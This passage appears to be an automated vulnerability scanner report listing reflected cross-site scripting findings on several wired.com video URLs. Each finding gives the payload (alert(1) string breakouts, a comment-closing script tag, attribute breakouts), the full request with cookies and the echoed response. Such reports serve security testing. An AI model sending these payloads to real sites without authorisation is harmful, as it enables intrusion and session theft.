Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:20 GMT
Date: Mon, 22 Nov 2010 00:54:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_making-the-soundtrack-harry-potter-and-the-deathly-hallows44987"><a>042fad4950 c_653378922001">
...[SNIP]...

1.1256. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 670ef"-alert(1)-"59cf895c586 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001670ef"-alert(1)-"59cf895c586 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=273
Expires: Mon, 22 Nov 2010 01:00:53 GMT
Date: Mon, 22 Nov 2010 00:56:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "making-the-soundtrack-harry-potter-and-the-deathly-hallows","653378922001670ef"-alert(1)-"59cf895c586","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1257. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a470f"><a>013bdc7dab4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001a470f"><a>013bdc7dab4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 01:00:32 GMT
Date: Mon, 22 Nov 2010 00:55:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_making-the-soundtrack-harry-potter-and-the-deathly-hallows c_653378922001a470f"><a>013bdc7dab4">
...[SNIP]...

1.1258. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/october-madness-meets-sharktoberfest/637752381001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c4ed8--><script>alert(1)</script>c2cb6fe8a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoc4ed8--><script>alert(1)</script>c2cb6fe8a5f/october-madness-meets-sharktoberfest/637752381001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29461
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 01:00:40 GMT
Date: Mon, 22 Nov 2010 00:55:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoc4ed8--><script>alert(1)</script>c2cb6fe8a5f/october-madness-meets-sharktoberfest/637752381001
-->
...[SNIP]...

1.1259. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/october-madness-meets-sharktoberfest/637752381001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 171bb"><a>78f80f90327 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video171bb"><a>78f80f90327/october-madness-meets-sharktoberfest/637752381001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29428
Vary: Accept-Encoding
Cache-Control: max-age=276
Expires: Mon, 22 Nov 2010 00:58:58 GMT
Date: Mon, 22 Nov 2010 00:54:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video171bb"><a>78f80f90327 ss_october-madness-meets-sharktoberfest c_637752381001">
...[SNIP]...

1.1260. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/october-madness-meets-sharktoberfest/637752381001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96a4f"-alert(1)-"ca9eb5635ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/october-madness-meets-sharktoberfest96a4f"-alert(1)-"ca9eb5635ad/637752381001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 01:01:32 GMT
Date: Mon, 22 Nov 2010 00:56:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "october-madness-meets-sharktoberfest96a4f"-alert(1)-"ca9eb5635ad","637752381001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1261. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/october-madness-meets-sharktoberfest/637752381001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29995"><a>a6225359441 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/october-madness-meets-sharktoberfest29995"><a>a6225359441/637752381001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 01:00:44 GMT
Date: Mon, 22 Nov 2010 00:55:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_october-madness-meets-sharktoberfest29995"><a>a6225359441 c_637752381001">
...[SNIP]...

1.1262. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/october-madness-meets-sharktoberfest/637752381001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 784d0"-alert(1)-"229d6c67458 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/october-madness-meets-sharktoberfest/637752381001784d0"-alert(1)-"229d6c67458 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=293
Expires: Mon, 22 Nov 2010 01:02:10 GMT
Date: Mon, 22 Nov 2010 00:57:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "637752381001784d0"-alert(1)-"229d6c67458","october-madness-meets-sharktoberfest","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1263. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/october-madness-meets-sharktoberfest/637752381001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e38"><a>f59f5b69106 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/october-madness-meets-sharktoberfest/63775238100181e38"><a>f59f5b69106 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=281
Expires: Mon, 22 Nov 2010 01:01:15 GMT
Date: Mon, 22 Nov 2010 00:56:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_october-madness-meets-sharktoberfest c_63775238100181e38"><a>f59f5b69106">
...[SNIP]...

1.1264. http://www.wired.com/video/reddit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/reddit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96636"><a>8f845e926ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video96636"><a>8f845e926ab/reddit HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29340
Vary: Accept-Encoding
Cache-Control: max-age=289
Expires: Mon, 22 Nov 2010 00:54:17 GMT
Date: Mon, 22 Nov 2010 00:49:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video96636"><a>8f845e926ab ss_reddit">
...[SNIP]...

1.1265. http://www.wired.com/video/reddit [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/reddit

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3f93"><a>681f894aa14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/redditc3f93"><a>681f894aa14 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=272
Expires: Mon, 22 Nov 2010 00:55:50 GMT
Date: Mon, 22 Nov 2010 00:51:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106668


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_redditc3f93"><a>681f894aa14">
...[SNIP]...

1.1266. http://www.wired.com/video/reddit [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/reddit

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b91b2"-alert(1)-"3d3cbc63103 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/redditb91b2"-alert(1)-"3d3cbc63103 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:27 GMT
Date: Mon, 22 Nov 2010 00:52:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "redditb91b2"-alert(1)-"3d3cbc63103","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1267. http://www.wired.com/video/science [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/science

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597a6"><a>6c7de32e4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video597a6"><a>6c7de32e4a/science HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29272
Vary: Accept-Encoding
Cache-Control: max-age=294
Expires: Mon, 22 Nov 2010 00:55:43 GMT
Date: Mon, 22 Nov 2010 00:50:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video597a6"><a>6c7de32e4a ss_science">
...[SNIP]...

1.1268. http://www.wired.com/video/science [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/science

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc810"-alert(1)-"430ff756626 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/sciencefc810"-alert(1)-"430ff756626 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=282
Expires: Mon, 22 Nov 2010 00:58:12 GMT
Date: Mon, 22 Nov 2010 00:53:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "sciencefc810"-alert(1)-"430ff756626","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1269. http://www.wired.com/video/science [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/science

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dbc6"><a>d4e24611f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/science9dbc6"><a>d4e24611f94 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:28 GMT
Date: Mon, 22 Nov 2010 00:52:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_science9dbc6"><a>d4e24611f94">
...[SNIP]...

1.1270. http://www.wired.com/video/search/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a9b"><a>b1b48537299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

